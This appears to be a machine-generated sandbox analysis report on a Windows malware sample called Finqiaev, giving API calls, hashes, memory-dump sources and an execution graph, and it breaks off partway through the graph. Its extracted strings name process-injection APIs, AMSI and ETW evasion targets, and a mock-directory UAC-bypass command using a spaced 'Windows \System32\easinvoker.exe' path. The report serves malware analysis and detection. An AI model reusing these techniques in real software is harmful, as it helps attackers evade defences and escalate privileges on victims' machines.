                                                                                                                                  • Instruction Fuzzy Hash: 7311E171646324AFE720CF65A8C47A7B7A8EF05790F004529ED56D7240D3B8F8908BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0416B1E5
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0416B1F0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                  • String ID: DISPLAY$GetMonitorInfoW
                                                                                                                                  • API String ID: 4116985748-2774842281
                                                                                                                                  • Opcode ID: 0b538257fa98759343728396b08cbc4f13f0aea78a7a91192824a38c884cf342
                                                                                                                                  • Instruction ID: 0af644a20a358bad4f4ab070b3791c82035cb5bc2dc30a0a1b78aff6a1e74e98
                                                                                                                                  • Opcode Fuzzy Hash: 0b538257fa98759343728396b08cbc4f13f0aea78a7a91192824a38c884cf342
                                                                                                                                  • Instruction Fuzzy Hash: 2F11AC716063209FE720CFA5A884BABB7E8EF45751F00852DED56E7240D7B5F894CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0416AF86
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0416AF98
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                  • String ID: MonitorFromPoint
                                                                                                                                  • API String ID: 4116985748-1072306578
                                                                                                                                  • Opcode ID: b65acb9da22eb9b9046d889f51e1ec847ecedc1d53c8631f82b020709680b71d
                                                                                                                                  • Instruction ID: fcd06bf61363ba6778c2eabbecbaa88c2023427a19bd5e25fd740ef2c822c1e5
                                                                                                                                  • Opcode Fuzzy Hash: b65acb9da22eb9b9046d889f51e1ec847ecedc1d53c8631f82b020709680b71d
                                                                                                                                  • Instruction Fuzzy Hash: 6201A2B1302244EFEB008E55D884B9DBB65EF863D5F004198FE06EB240D3B4FCA187A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0416AE61
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0416AE6D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Offset: 04141000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_4141000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                  • String ID: MonitorFromRect
                                                                                                                                  • API String ID: 4116985748-4033241945
                                                                                                                                  • Opcode ID: 7803b0490fcba4a2daea5138e30f98f3625c50713645bcbaa5937a0e09de48dd
                                                                                                                                  • Instruction ID: 7f0dc1c240ed31039dc3f0ad58c7bdfca2230987aefbe03f951761f5a42a982b
                                                                                                                                  • Opcode Fuzzy Hash: 7803b0490fcba4a2daea5138e30f98f3625c50713645bcbaa5937a0e09de48dd
                                                                                                                                  • Instruction Fuzzy Hash: 4A016276302114ABEB10CE15D5C4B66BBA9DF823D5F048491E906EB101C3B8EC90CFA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpall goroutines are asleep - deadlock!godebug: unexpected IncNonDefault of cannot create context from nil parenttoo many Authorities to pack (>65535)t, xrefs: 00430A68
                                                                                                                                  • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: expected an RSA public key, got %Ttls: malformed key_sha, xrefs: 00430A32
                                                                                                                                  • %, xrefs: 00430A71
                                                                                                                                  • bad g0 stackself-preemptbad recoverybad g statusentersyscallcas64 failedabi mismatchRCodeSuccessRCodeRefusedGetConsoleCPnot pollableremote errorc hs traffics hs trafficc ap traffics ap trafficclose notifyMime-VersionX-ImforwardsX-Powered-ByContent Type (sensit, xrefs: 00430A17
                                                                                                                                  • CreateWaitableTimerEx when creating timer failedparsing/packing of this type isn't available yetfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curveCould not convert to time, passing current time.x509: X25519 key enc, xrefs: 00430A4D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000001.1622599769.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000001.1622599769.000000000088B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000001.1622599769.000000000088F000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000001.1622599769.00000000008AB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000001.1622599769.00000000008B5000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_1_400000_veaiqniF.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %$CreateWaitableTimerEx when creating timer failedparsing/packing of this type isn't available yetfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curveCould not convert to time, passing current time.x509: X25519 key enc$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: expected an RSA public key, got %Ttls: malformed key_sha$bad g0 stackself-preemptbad recoverybad g statusentersyscallcas64 failedabi mismatchRCodeSuccessRCodeRefusedGetConsoleCPnot pollableremote errorc hs traffics hs trafficc ap traffics ap trafficclose notifyMime-VersionX-ImforwardsX-Powered-ByContent Type (sensit$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpall goroutines are asleep - deadlock!godebug: unexpected IncNonDefault of cannot create context from nil parenttoo many Authorities to pack (>65535)t
                                                                                                                                  • API String ID: 0-1005992549
                                                                                                                                  • Opcode ID: 4f18a8ab7f1fc0e6ed754dd09081ecf5ba98835150bc7094af54289576bc5370
                                                                                                                                  • Instruction ID: d6b05460dce053fcb725ba51d2c67ca3e53d8b493b6d73661264cc7acd7f9677
                                                                                                                                  • Opcode Fuzzy Hash: 4f18a8ab7f1fc0e6ed754dd09081ecf5ba98835150bc7094af54289576bc5370
                                                                                                                                  • Instruction Fuzzy Hash: 4D51F4B45087018FD300EF25D194B5ABBF0BF8A718F009A6EE8988B392D739D945CF56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:6.8%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:404
                                                                                                                                  Total number of Limit Nodes:23
                                                                                                                                  execution_graph 38253 40b1b2b 38254 40b1c08 38253->38254 38255 40b1b3d 38253->38255 38256 40b1784 38254->38256 38257 40b1b43 38254->38257 38255->38257 38258 40b1baf Sleep 38255->38258 38260 40b1d02 38256->38260 38270 40b16e0 38256->38270 38259 40b1b4c 38257->38259 38262 40b1be7 Sleep 38257->38262 38267 40b1c1d 38257->38267 38258->38257 38261 40b1bc9 Sleep 38258->38261 38261->38255 38264 40b1bfd Sleep 38262->38264 38262->38267 38264->38257 38266 40b17a9 38268 40b1c9c VirtualFree 38267->38268 38269 40b1c40 38267->38269 38271 40b171d VirtualFree 38270->38271 38272 40b16e9 38270->38272 38271->38266 38272->38271 38273 40b16eb Sleep 38272->38273 38274 40b1700 38273->38274 38274->38271 38275 40b1704 Sleep 38274->38275 38275->38272 38276 40d765c MulDiv 38277 40d76ae 38276->38277 38278 40d7698 38276->38278 38292 40d0204 38277->38292 38342 40d7618 SelectObject ReleaseDC 38278->38342 38281 40d76ba 38296 40d02a4 38281->38296 38282 40d769d 38282->38277 38343 40b4820 38282->38343 38288 40d7701 38293 40d020a 38292->38293 38294 40d02a4 10 API calls 38293->38294 38295 40d0222 38294->38295 38295->38281 38297 40d02cb 38296->38297 38298 40d02b1 38296->38298 38302 40d0308 38297->38302 38299 40d02b7 RegCloseKey 38298->38299 38300 40d02c1 38298->38300 38299->38300 38301 40d0274 9 API calls 38300->38301 38301->38297 38303 40b4820 8 API calls 38302->38303 38304 40d0331 38303->38304 38306 40d0351 38304->38306 38352 40b4cec 8 API calls 38304->38352 38307 40d0373 RegOpenKeyExA 38306->38307 38308 40d0385 38307->38308 38313 40d03c1 38307->38313 38309 40d03af 38308->38309 38353 40b4b0c 38308->38353 38362 40d02d0 9 API calls 38309->38362 38312 40d03bc 38365 40b4788 38312->38365 38314 40d03de RegOpenKeyExA 38313->38314 38315 40d03f0 38314->38315 38321 40d0429 38314->38321 38317 40d041a 38315->38317 38319 40b4b0c 8 API calls 38315->38319 38363 40d02d0 9 API calls 38317->38363 38319->38317 38322 40d0443 RegOpenKeyExA 38321->38322 38322->38312 38323 40d0455 38322->38323 38324 40d047f 38323->38324 38325 40b4b0c 8 API calls 38323->38325 38364 40d02d0 9 API calls 38324->38364 38325->38324 38327 40d0538 38405 40d0510 38327->38405 38330 40d05a1 38333 40b4788 8 API calls 38330->38333 38331 40d0552 38408 40b4878 38331->38408 38339 40d0596 38333->38339 38334 40d055d 38413 40d05b0 38334->38413 38336 40d0575 38337 40d0598 38336->38337 38340 40d0581 38336->38340 38417 40d019c 32 API calls 38337->38417 38347 40d0274 38339->38347 38341 40b4ed4 8 API calls 38340->38341 38341->38339 38342->38282 38345 40b4824 38343->38345 38344 40b4848 38344->38277 38345->38344 38346 40b2cc8 8 API calls 38345->38346 38346->38344 38348 40d027e 38347->38348 38349 40d02a0 38347->38349 38350 40d028a RegCloseKey 38348->38350 38349->38288 38351 40b4788 8 API calls 38350->38351 38351->38349 38352->38306 38354 40b4b1d 38353->38354 38355 40b4b5a 38354->38355 38356 40b4b43 38354->38356 38375 40b484c 38355->38375 38369 40b4ed4 38356->38369 38359 40b4b8b 38360 40b4b50 38360->38359 38380 40b47dc 38360->38380 38362->38312 38363->38312 38364->38312 38366 40b47a9 38365->38366 38367 40b478e 38365->38367 38366->38288 38366->38327 38367->38366 38368 40b2cc8 8 API calls 38367->38368 38368->38366 38370 40b4ee1 38369->38370 38374 40b4f11 38369->38374 38372 40b4eed 38370->38372 38373 40b484c 8 API calls 38370->38373 38371 40b4788 8 API calls 38371->38372 38372->38360 38373->38374 38374->38371 38376 40b4850 38375->38376 38377 40b4874 38375->38377 38386 40b2cac 38376->38386 38377->38360 38379 40b485d 38379->38360 38381 40b47e0 38380->38381 38382 40b47f0 38380->38382 38381->38382 38384 40b484c 8 API calls 38381->38384 38383 40b481e 38382->38383 38396 40b2cc8 38382->38396 38383->38359 38384->38382 38387 40b2cc3 38386->38387 38389 40b2cb0 38386->38389 38387->38379 38388 40b2cba 38388->38379 38389->38388 38390 40b2dd5 38389->38390 38394 40b686c TlsGetValue 38389->38394 38395 40b2da4 7 API calls 38390->38395 38393 40b2df6 38393->38379 38394->38390 38395->38393 38397 40b2cd6 38396->38397 38398 40b2ccc 38396->38398 38397->38383 38398->38397 38399 40b2dd5 38398->38399 38403 40b686c TlsGetValue 38398->38403 38404 40b2da4 7 API calls 38399->38404 38402 40b2df6 38402->38383 38403->38399 38404->38402 38418 40d04c0 38405->38418 38407 40d0524 38407->38330 38407->38331 38409 40b484c 8 API calls 38408->38409 38410 40b4888 38409->38410 38411 40b4788 8 API calls 38410->38411 38412 40b48a0 38411->38412 38412->38334 38414 40d05d6 38413->38414 38416 40d0603 38414->38416 38422 40bc184 32 API calls 38414->38422 38416->38336 38417->38339 38419 40d04d9 38418->38419 38420 40d04ed RegQueryValueExA 38419->38420 38421 40d0504 38420->38421 38421->38407 38422->38416 38423 4119740 38431 40b68b8 38423->38431 38427 411976e 38428 4119786 GetMessageA 38427->38428 38429 4119796 38428->38429 38430 411977a TranslateMessage DispatchMessageA 38428->38430 38430->38428 38432 40b68c3 38431->38432 38436 40b4444 38432->38436 38435 40b4558 SysFreeString 38435->38427 38437 40b448a 38436->38437 38438 40b4503 38437->38438 38439 40b4694 38437->38439 38450 40b43dc 38438->38450 38442 40b46c5 38439->38442 38445 40b46d6 38439->38445 38456 40b4608 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38442->38456 38444 40b46cf 38444->38445 38446 40b471b FreeLibrary 38445->38446 38447 40b473f 38445->38447 38446->38445 38448 40b4748 38447->38448 38449 40b474e ExitProcess 38447->38449 38448->38449 38451 40b441f 38450->38451 38452 40b43ec 38450->38452 38451->38435 38452->38451 38457 40b1668 38452->38457 38461 41195f8 38452->38461 38475 40b5b78 38452->38475 38456->38444 38479 40b15fc 38457->38479 38459 40b1670 VirtualAlloc 38460 40b1687 38459->38460 38460->38452 38462 4119670 38461->38462 38463 4119612 GetVersion 38461->38463 38462->38452 38481 40f7420 GetCurrentProcessId 38463->38481 38467 4119636 38513 40c7200 34 API calls 38467->38513 38469 4119640 38514 40c71ac 34 API calls 38469->38514 38471 4119650 38515 40c71ac 34 API calls 38471->38515 38473 4119660 38516 40c71ac 34 API calls 38473->38516 38476 40b5b88 GetModuleFileNameA 38475->38476 38477 40b5ba4 38475->38477 38670 40b5ddc GetModuleFileNameA RegOpenKeyExA 38476->38670 38477->38452 38480 40b159c 38479->38480 38480->38459 38517 40b96ec 38481->38517 38484 40b47dc 8 API calls 38485 40f7469 38484->38485 38486 40f7479 GetCurrentThreadId 38485->38486 38487 40b96ec 32 API calls 38486->38487 38488 40f74ad 38487->38488 38489 40b47dc 8 API calls 38488->38489 38490 40f74ba 38489->38490 38491 40f74c4 GlobalAddAtomA 38490->38491 38520 40b4c4c 38491->38520 38495 40f74f1 38526 40f7028 38495->38526 38497 40f74fb 38534 40f6dd4 38497->38534 38499 40f7507 38538 4101538 38499->38538 38501 40f751a 38555 4102740 38501->38555 38503 40f7530 38572 40c72ec 34 API calls 38503->38572 38505 40f755a GetModuleHandleA 38506 40f757a 38505->38506 38507 40f756a GetProcAddress 38505->38507 38508 40b4788 8 API calls 38506->38508 38507->38506 38509 40f758f 38508->38509 38510 40b4788 8 API calls 38509->38510 38511 40f7597 38510->38511 38512 40c7160 34 API calls 38511->38512 38512->38467 38513->38469 38514->38471 38515->38473 38516->38462 38573 40b9700 38517->38573 38521 40b4c50 RegisterClipboardFormatA 38520->38521 38522 40c7b44 38521->38522 38523 40c7b4a 38522->38523 38524 40c7b5f RtlInitializeCriticalSection 38523->38524 38525 40c7b74 38524->38525 38525->38495 38527 40f703c SetErrorMode 38526->38527 38528 40f7195 38526->38528 38529 40f707c 38527->38529 38530 40f7060 GetModuleHandleA GetProcAddress 38527->38530 38528->38497 38531 40f7089 LoadLibraryA 38529->38531 38532 40f7177 SetErrorMode 38529->38532 38530->38529 38531->38532 38533 40f70a5 10 API calls 38531->38533 38532->38497 38533->38532 38535 40f6dda 38534->38535 38588 40f6fc4 38535->38588 38537 40f6e48 38537->38499 38539 4101542 38538->38539 38601 40cd8bc 38539->38601 38541 4101558 38605 41018f4 LoadCursorA 38541->38605 38544 4101591 38545 41015cd GetDC GetDeviceCaps ReleaseDC 38544->38545 38546 4101603 38545->38546 38610 40d1fe4 38546->38610 38548 410160f 38549 40d1fe4 10 API calls 38548->38549 38550 4101621 38549->38550 38551 40d1fe4 10 API calls 38550->38551 38552 4101633 38551->38552 38614 4101d24 38552->38614 38554 4101640 38554->38501 38556 410274f 38555->38556 38557 40cd8bc 32 API calls 38556->38557 38558 4102765 38557->38558 38559 4102822 LoadIconA 38558->38559 38652 40d7524 38559->38652 38561 4102845 GetModuleFileNameA OemToCharA 38562 410288e 38561->38562 38563 41028b4 CharNextA CharLowerA 38562->38563 38564 41028dc 38563->38564 38654 40cea38 GetClassInfoA 38564->38654 38567 4102905 38664 4104b14 8 API calls 38567->38664 38568 41028fe 38663 4102a94 49 API calls 38568->38663 38571 4102927 38571->38503 38572->38505 38574 40b9726 38573->38574 38576 40b9759 38574->38576 38586 40b92f4 32 API calls 38574->38586 38577 40b97c3 38576->38577 38585 40b9776 38576->38585 38578 40b4878 8 API calls 38577->38578 38582 40b96fb 38578->38582 38579 40b97b7 38581 40b4ed4 8 API calls 38579->38581 38580 40b4788 8 API calls 38580->38585 38581->38582 38582->38484 38583 40b4ed4 8 API calls 38583->38585 38585->38579 38585->38580 38585->38583 38587 40b92f4 32 API calls 38585->38587 38586->38576 38587->38585 38589 40f6fcc 38588->38589 38590 40f6fd3 38588->38590 38591 40f700f SendMessageA 38589->38591 38592 40f6ffe SystemParametersInfoA 38589->38592 38598 40f6fd1 38589->38598 38593 40f6fe9 38590->38593 38594 40f6fe0 38590->38594 38591->38598 38592->38598 38600 40f6f24 SystemParametersInfoA 38593->38600 38599 40f6f54 RegisterClipboardFormatA RegisterClipboardFormatA SendMessageA SendMessageA 38594->38599 38597 40f6ff0 38597->38537 38598->38537 38599->38598 38600->38597 38602 40cd8c3 38601->38602 38604 40cd8e8 38602->38604 38632 40cda78 32 API calls 38602->38632 38604->38541 38606 4101913 38605->38606 38607 410192c LoadCursorA 38606->38607 38609 410157b GetKeyboardLayout 38606->38609 38633 41019b0 38607->38633 38609->38544 38611 40d1fea 38610->38611 38636 40d14f0 38611->38636 38613 40d200c 38613->38548 38615 4101d3d 38614->38615 38616 4101d6f SystemParametersInfoA 38615->38616 38617 4101d82 CreateFontIndirectA 38616->38617 38618 4101d9a 38616->38618 38646 40d2434 13 API calls 38617->38646 38647 40d2434 13 API calls 38618->38647 38620 4101d98 38621 4101dae SystemParametersInfoA 38620->38621 38623 4101e02 38621->38623 38624 4101dce CreateFontIndirectA 38621->38624 38650 40d2518 13 API calls 38623->38650 38648 40d2434 13 API calls 38624->38648 38627 4101e12 GetStockObject 38651 40d2434 13 API calls 38627->38651 38628 4101de7 CreateFontIndirectA 38649 40d2434 13 API calls 38628->38649 38631 4101e00 38631->38554 38632->38604 38634 40b2cac 8 API calls 38633->38634 38635 41019c3 38634->38635 38635->38606 38637 40d150b 38636->38637 38644 40d14d8 RtlEnterCriticalSection 38637->38644 38639 40b2cac 8 API calls 38642 40d1572 38639->38642 38641 40d1515 38641->38639 38641->38642 38645 40d14e4 RtlLeaveCriticalSection 38642->38645 38643 40d15c3 38643->38613 38644->38641 38645->38643 38646->38620 38647->38621 38648->38628 38649->38631 38650->38627 38651->38631 38653 40d7530 38652->38653 38653->38561 38655 40cea68 38654->38655 38656 40cea91 38655->38656 38657 40cea76 UnregisterClassA 38655->38657 38658 40cea87 RegisterClassA 38655->38658 38665 40b738c 38656->38665 38657->38658 38658->38656 38660 40ceabf 38661 40ceadc 38660->38661 38662 40cead3 SetWindowLongA 38660->38662 38661->38567 38661->38568 38662->38661 38663->38567 38664->38571 38669 40b2ffc 38665->38669 38667 40b739f CreateWindowExA 38668 40b73d9 38667->38668 38668->38660 38669->38667 38671 40b5e5f 38670->38671 38672 40b5e1f RegOpenKeyExA 38670->38672 38688 40b5c18 6 API calls 38671->38688 38672->38671 38673 40b5e3d RegOpenKeyExA 38672->38673 38673->38671 38675 40b5ee8 lstrcpyn GetThreadLocale GetLocaleInfoA 38673->38675 38679 40b5f1f 38675->38679 38680 40b6002 38675->38680 38676 40b5e84 RegQueryValueExA 38677 40b5ec6 RegCloseKey 38676->38677 38678 40b5ea4 RegQueryValueExA 38676->38678 38677->38477 38678->38677 38681 40b5ec2 38678->38681 38679->38680 38682 40b5f2f lstrlen 38679->38682 38680->38477 38681->38677 38683 40b5f47 38682->38683 38683->38680 38684 40b5f6c lstrcpyn LoadLibraryExA 38683->38684 38685 40b5f94 38683->38685 38684->38685 38685->38680 38686 40b5f9e lstrcpyn LoadLibraryExA 38685->38686 38686->38680 38687 40b5fd0 lstrcpyn LoadLibraryExA 38686->38687 38687->38680 38688->38676 38689 4118704 38692 410ca40 38689->38692 38693 410ca48 38692->38693 38693->38693 38694 410ca4f 38693->38694 38695 410ca74 38694->38695 38696 410ca7a 38695->38696 38697 410ca7e 38696->38697 38698 410ca8f 38696->38698 38699 40b47dc 8 API calls 38697->38699 38700 40b47dc 8 API calls 38698->38700 38701 410ca8d 38699->38701 38700->38701 38702 40b4b0c 8 API calls 38701->38702 38703 410cabc 38702->38703 38704 40b4c4c 38703->38704 38705 410cac4 38704->38705 38706 410cace 38705->38706 38707 410cae7 38706->38707 38708 410caef 38707->38708 38709 410caf9 38708->38709 40467 40cfd38 38709->40467 38712 40b4b0c 8 API calls 38713 410cb20 38712->38713 38714 40b4c4c 38713->38714 38715 410cb28 38714->38715 40476 40b4980 38715->40476 40468 40cfd4c 40467->40468 40469 40cfd90 GetProcAddress 40468->40469 40470 40cfdb8 40469->40470 40471 40cfdd2 GetCurrentProcess 40470->40471 40472 40cfb78 40471->40472 40473 40cfdee FreeLibrary 40472->40473 40478 40b47ac 40473->40478 40477 40b4986 40476->40477 40479 40b47b2 40478->40479 40480 40b47d8 40479->40480 40481 40b2cc8 8 API calls 40479->40481 40480->38712 40481->40479 40482 40b17c3 40483 40b17d8 40482->40483 40484 40b1a04 40482->40484 40492 40b17ea 40483->40492 40494 40b1867 Sleep 40483->40494 40485 40b19d4 40484->40485 40486 40b1b1c 40484->40486 40490 40b19e3 Sleep 40485->40490 40493 40b1a22 40485->40493 40487 40b1720 VirtualAlloc 40486->40487 40488 40b1b25 40486->40488 40489 40b174b 40487->40489 40499 40b175b 40487->40499 40495 40b16e0 2 API calls 40489->40495 40490->40493 40497 40b19f9 Sleep 40490->40497 40491 40b17f9 40492->40491 40496 40b18c8 40492->40496 40500 40b18a6 Sleep 40492->40500 40501 40b1668 VirtualAlloc 40493->40501 40503 40b1a40 40493->40503 40494->40492 40498 40b1880 Sleep 40494->40498 40495->40499 40504 40b1668 VirtualAlloc 40496->40504 40505 40b18d4 40496->40505 40497->40485 40498->40483 40500->40496 40502 40b18bc Sleep 40500->40502 40501->40503 40502->40492 40504->40505 40506 40b4fa4 40507 40b4f68 40506->40507 40508 40b4f38 40506->40508 40507->40508 40509 40b4f6e SysFreeString 40507->40509 40509->40508
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$FileName$CloseName_$AddressAttributesCurrentFreeLibraryModuleProcProcessWrite
                                                                                                                                  • String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
                                                                                                                                  • API String ID: 976750054-2902499223
                                                                                                                                  • Opcode ID: 48fd5c8a2035c70a330b57b670423a5cfa6e2239f7915ae0acec345bb3aa12ad
                                                                                                                                  • Instruction ID: 356d8c8943496306d1fd1241ef1c0a8819ec3f0f726ea63b7293459b5b4a53da
                                                                                                                                  • Opcode Fuzzy Hash: 48fd5c8a2035c70a330b57b670423a5cfa6e2239f7915ae0acec345bb3aa12ad
                                                                                                                                  • Instruction Fuzzy Hash: A8F31B35A011198BEB11EB64DD80ADEB3B6AF8560CF1044E6E149B7361DB34FF858F89
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 4215 40d7e4c-40d7e4f 4216 40d7e54-40d7e59 4215->4216 4216->4216 4217 40d7e5b-40d7ee9 call 40b4c3c call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 4216->4217 4234 40d96ad-40d96f5 call 40b47ac * 2 call 40b4f68 call 40b47ac 4217->4234 4235 40d7eef-40d7fca call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 4217->4235 4235->4234 4272 40d7fd0-40d82e0 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b320c * 2 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b50e8 call 40b50f8 call 40b6a24 4235->4272 4381 40d8353-40d85d5 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b2f9c call 40b2fc4 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 GetThreadContext 4272->4381 4382 40d82e2-40d834e call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 4272->4382 4381->4234 4470 40d85db-40d883e call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 NtReadVirtualMemory 4381->4470 4382->4381 4541 40d8b4b-40d8bb7 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 4470->4541 4542 40d8844-40d89ad call 40b4b0c call 40b4c4c call 40b4980 call 